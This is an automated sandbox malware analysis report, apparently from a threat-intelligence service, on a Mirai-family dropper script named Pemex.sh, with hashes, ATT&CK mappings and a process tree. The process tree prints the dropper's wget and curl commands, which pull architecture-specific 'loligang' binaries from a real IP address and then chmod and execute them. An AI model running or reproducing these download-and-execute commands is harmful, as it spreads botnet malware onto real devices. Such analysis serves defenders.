Analysis
max time kernel
150s
max time network
155s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system
submitted
23-12-2024 06:19
Static task
static1
Behavioral task
behavioral1
Sample
Pemex.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
Pemex.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
Pemex.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
Pemex.sh
Resource
debian9-mipsel-20240418-en
General
Target
Pemex.sh
Size
1KB
MD5
e18ba04d72384ac85e6117c774f6d4f9
SHA1
6cb8e9a2da2db042da0875a08f43cc867b8a2c5b
SHA256
289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e
SHA512
3e69c0fdb07347f2dcd8d3b3d9514d392a572173afec60fd702180cf3f7d5d21bca67dff2cb022641c7f0a2df4b817f1589a6a1599726ddeea67ba5c768e954d
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
Contacts a large (73374) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process
805 chmod
816 chmod
827 chmod
848 chmod
873 chmod
890 chmod
735 chmod
779 chmod
-
Executes dropped EXE 8 IoCs
ioc pid Process
/tmp/awoo 736 awoo
/tmp/awoo 780 awoo
/tmp/awoo 806 awoo
/tmp/awoo 817 awoo
/tmp/awoo 828 awoo
/tmp/awoo 849 awoo
/tmp/awoo 874 awoo
/tmp/awoo 891 awoo
-
Modifies Watchdog functionality 1 TTPs 14 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process
File opened for modification /dev/watchdog awoo
File opened for modification /dev/watchdog awoo
File opened for modification /dev/watchdog awoo
File opened for modification /dev/misc/watchdog awoo
File opened for modification /dev/watchdog awoo
File opened for modification /dev/misc/watchdog awoo
File opened for modification /dev/misc/watchdog awoo
File opened for modification /dev/watchdog awoo
File opened for modification /dev/misc/watchdog awoo
File opened for modification /dev/watchdog awoo
File opened for modification /dev/misc/watchdog awoo
File opened for modification /dev/misc/watchdog awoo
File opened for modification /dev/watchdog awoo
File opened for modification /dev/misc/watchdog awoo
-
Enumerates active TCP sockets 1 TTPs 7 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process
File opened for reading /proc/net/tcp awoo
File opened for reading /proc/net/tcp awoo
File opened for reading /proc/net/tcp awoo
File opened for reading /proc/net/tcp awoo
File opened for reading /proc/net/tcp awoo
File opened for reading /proc/net/tcp awoo
File opened for reading /proc/net/tcp awoo
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads system network configuration 1 TTPs 7 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process
File opened for reading /proc/net/tcp awoo
File opened for reading /proc/net/tcp awoo
File opened for reading /proc/net/tcp awoo
File opened for reading /proc/net/tcp awoo
File opened for reading /proc/net/tcp awoo
File opened for reading /proc/net/tcp awoo
File opened for reading /proc/net/tcp awoo
description ioc Process
File opened for reading /proc/1/fd awoo
File opened for reading /proc/708/fd awoo
File opened for reading /proc/347/fd awoo
File opened for reading /proc/781/exe awoo
File opened for reading /proc/347/fd awoo
File opened for reading /proc/405/fd awoo
File opened for reading /proc/405/fd awoo
File opened for reading /proc/384/fd awoo
File opened for reading /proc/781/fd awoo
File opened for reading /proc/371/fd awoo
File opened for reading /proc/1/fd awoo
File opened for reading /proc/702/exe awoo
File opened for reading /proc/875/fd awoo
File opened for reading /proc/704/exe awoo
File opened for reading /proc/473/exe awoo
File opened for reading /proc/783/fd awoo
File opened for reading /proc/319/fd awoo
File opened for reading /proc/831/fd awoo
File opened for reading /proc/347/fd awoo
File opened for reading /proc/142/fd awoo
File opened for reading /proc/820/fd awoo
File opened for reading /proc/850/fd awoo
File opened for reading /proc/sys/crypto/fips_enabled curl
File opened for reading /proc/705/fd awoo
File opened for reading /proc/896/fd awoo
File opened for reading /proc/856/fd awoo
File opened for reading /proc/832/exe awoo
File opened for reading /proc/821/fd awoo
File opened for reading /proc/812/fd awoo
File opened for reading /proc/853/fd awoo
File opened for reading /proc/682/exe awoo
File opened for reading /proc/510/fd awoo
File opened for reading /proc/798/fd awoo
File opened for reading /proc/sys/crypto/fips_enabled curl
File opened for reading /proc/405/fd awoo
File opened for reading /proc/473/fd awoo
File opened for reading /proc/821/fd awoo
File opened for reading /proc/228/fd awoo
File opened for reading /proc/405/exe awoo
File opened for reading /proc/466/fd awoo
File opened for reading /proc/879/exe awoo
File opened for reading /proc/895/fd awoo
File opened for reading /proc/881/fd awoo
File opened for reading /proc/856/fd awoo
File opened for reading /proc/sys/crypto/fips_enabled curl
File opened for reading /proc/373/fd awoo
File opened for reading /proc/466/exe awoo
File opened for reading /proc/832/fd awoo
File opened for reading /proc/820/fd awoo
File opened for reading /proc/812/fd awoo
File opened for reading /proc/875/exe awoo
File opened for reading /proc/405/fd awoo
File opened for reading /proc/473/fd awoo
File opened for reading /proc/466/exe awoo
File opened for reading /proc/856/fd awoo
File opened for reading /proc/705/exe awoo
File opened for reading /proc/466/exe awoo
File opened for reading /proc/682/exe awoo
File opened for reading /proc/321/fd awoo
File opened for reading /proc/783/fd awoo
File opened for reading /proc/167/fd awoo
File opened for reading /proc/703/exe awoo
File opened for reading /proc/895/exe awoo
File opened for reading /proc/812/fd awoo
-
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process
738 wget
752 curl
777 cat
-
Writes file to tmp directory 17 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process
File opened for modification /tmp/loligang.ppc curl
File opened for modification /tmp/loligang.mpsl wget
File opened for modification /tmp/loligang.mips wget
File opened for modification /tmp/loligang.arm5 curl
File opened for modification /tmp/loligang.arm6 curl
File opened for modification /tmp/loligang.arm7 wget
File opened for modification /tmp/awoo Pemex.sh
File opened for modification /tmp/loligang.mpsl curl
File opened for modification /tmp/loligang.arm4 curl
File opened for modification /tmp/loligang.mips curl
File opened for modification /tmp/loligang.x86 curl
File opened for modification /tmp/loligang.arm5 wget
File opened for modification /tmp/loligang.arm6 wget
File opened for modification /tmp/loligang.arm7 curl
File opened for modification /tmp/loligang.ppc wget
File opened for modification /tmp/loligang.m68k wget
File opened for modification /tmp/loligang.x86 wget
Processes
/tmp/Pemex.sh
  Command: /tmp/Pemex.sh
  - Writes file to tmp directory
  PID:705
  /usr/bin/wget
    Command: wget http://185.255.120.43/lmaoWTF/loligang.x86
    - Writes file to tmp directory
    PID:712
  /usr/bin/curl
    Command: curl -O http://185.255.120.43/lmaoWTF/loligang.x86
    - Reads runtime system information
    - Writes file to tmp directory
    PID:732
  /bin/cat
    Command: cat loligang.x86
    PID:734
  /bin/chmod
    Command: chmod +x awoo loligang.x86 Pemex.sh systemd-private-a76e6c52f6484569955a0300d27efee0-systemd-timedated.service-LGu9q4
    - File and Directory Permissions Modification
    PID:735
  /tmp/awoo
    Command: ./awoo
    - Executes dropped EXE
    PID:736
  /usr/bin/wget
    Command: wget http://185.255.120.43/lmaoWTF/loligang.mips
    - System Network Configuration Discovery
    - Writes file to tmp directory
    PID:738
  /usr/bin/curl
    Command: curl -O http://185.255.120.43/lmaoWTF/loligang.mips
    - System Network Configuration Discovery
    - Writes file to tmp directory
    PID:752
  /bin/cat
    Command: cat loligang.mips
    - System Network Configuration Discovery
    PID:777
  /bin/chmod
    Command: chmod +x awoo loligang.mips loligang.x86 Pemex.sh systemd-private-a76e6c52f6484569955a0300d27efee0-systemd-timedated.service-LGu9q4
    - File and Directory Permissions Modification
    PID:779
  /tmp/awoo
    Command: ./awoo
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Enumerates active TCP sockets
    - Reads system network configuration
    - Reads runtime system information
    PID:780
  /usr/bin/wget
    Command: wget http://185.255.120.43/lmaoWTF/loligang.mpsl
    - Writes file to tmp directory
    PID:787
  /usr/bin/curl
    Command: curl -O http://185.255.120.43/lmaoWTF/loligang.mpsl
    - Writes file to tmp directory
    PID:801
  /bin/chmod
    Command: chmod +x awoo loligang.mips loligang.mpsl loligang.x86 Pemex.sh
    - File and Directory Permissions Modification
    PID:805
  /tmp/awoo
    Command: ./awoo
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Enumerates active TCP sockets
    - Reads system network configuration
    - Reads runtime system information
    PID:806
  /usr/bin/wget
    Command: wget http://185.255.120.43/lmaoWTF/loligang.arm4
    PID:813
  /usr/bin/curl
    Command: curl -O http://185.255.120.43/lmaoWTF/loligang.arm4
    - Writes file to tmp directory
    PID:814
  /bin/chmod
    Command: chmod +x awoo loligang.arm4 loligang.mips loligang.mpsl loligang.x86 Pemex.sh
    - File and Directory Permissions Modification
    PID:816
  /tmp/awoo
    Command: ./awoo
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Enumerates active TCP sockets
    - Reads system network configuration
    - Reads runtime system information
    PID:817
  /usr/bin/wget
    Command: wget http://185.255.120.43/lmaoWTF/loligang.arm5
    - Writes file to tmp directory
    PID:824
  /usr/bin/curl
    Command: curl -O http://185.255.120.43/lmaoWTF/loligang.arm5
    - Writes file to tmp directory
    PID:825
  /bin/chmod
    Command: chmod +x awoo loligang.arm4 loligang.arm5 loligang.mips loligang.mpsl loligang.x86 Pemex.sh
    - File and Directory Permissions Modification
    PID:827
  /tmp/awoo
    Command: ./awoo
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Enumerates active TCP sockets
    - Reads system network configuration
    - Reads runtime system information
    PID:828
  /usr/bin/wget
    Command: wget http://185.255.120.43/lmaoWTF/loligang.arm6
    - Writes file to tmp directory
    PID:835
  /usr/bin/curl
    Command: curl -O http://185.255.120.43/lmaoWTF/loligang.arm6
    - Reads runtime system information
    - Writes file to tmp directory
    PID:836
  /bin/chmod
    Command: chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.mips loligang.mpsl loligang.x86 Pemex.sh
    - File and Directory Permissions Modification
    PID:848
  /tmp/awoo
    Command: ./awoo
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Enumerates active TCP sockets
    - Reads system network configuration
    - Reads runtime system information
    PID:849
  /usr/bin/wget
    Command: wget http://185.255.120.43/lmaoWTF/loligang.arm7
    - Writes file to tmp directory
    PID:854
  /usr/bin/curl
    Command: curl -O http://185.255.120.43/lmaoWTF/loligang.arm7
    - Writes file to tmp directory
    PID:863
  /bin/chmod
    Command: chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.mips loligang.mpsl loligang.x86 Pemex.sh
    - File and Directory Permissions Modification
    PID:873
  /tmp/awoo
    Command: ./awoo
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Enumerates active TCP sockets
    - Reads system network configuration
    - Reads runtime system information
    PID:874
  /usr/bin/wget
    Command: wget http://185.255.120.43/lmaoWTF/loligang.ppc
    - Writes file to tmp directory
    PID:878
  /usr/bin/curl
    Command: curl -O http://185.255.120.43/lmaoWTF/loligang.ppc
    - Writes file to tmp directory
    PID:888
  /bin/chmod
    Command: chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.mips loligang.mpsl loligang.ppc loligang.x86 Pemex.sh
    - File and Directory Permissions Modification
    PID:890
  /tmp/awoo
    Command: ./awoo
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Enumerates active TCP sockets
    - Reads system network configuration
    - Reads runtime system information
    PID:891
  /usr/bin/wget
    Command: wget http://185.255.120.43/lmaoWTF/loligang.m68k
    - Writes file to tmp directory
    PID:895
  /usr/bin/curl
    Command: curl -O http://185.255.120.43/lmaoWTF/loligang.m68k
    - Reads runtime system information
    PID:899
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification 1
Linux and Mac File and Directory Permissions Modification 1
Impair Defenses 1
Downloads
-
Filesize
87KB
MD5
5f6d2539a443501c888fc90986479ee6
SHA1
1f1ce02f9cafc0e684559cd7e36170d6cba370dc
SHA256
5775d9b48bb5c73f8e4625ee86f07e33967aecca610947654e8eea692e200137
SHA512
3bd781322c46687a8d750c1129b843a2a2312b186094d5918d5d8eac8c0b04ef8ee14a6a14fb74eb557bdb6558f78301a597ee651c4ace2aa23ebe02554a7198
-
Filesize
64KB
MD5
2354f2531c0bf296738fa7733c42785f
SHA1
86508e4ee74c70bf226f6666bf227a12be69dcad
SHA256
3d0b5252c0f8736759af8b122612395ea484794afbdeb5435769f3c164d04c93
SHA512
eda30463d2e8355af4d6626815aedb78b1b5d43c4df53e4a9a72405074a22e9fd09f54e882b0c5ad5136202907a7e6e599d29d325d6e0b3188e6f8ff77abe679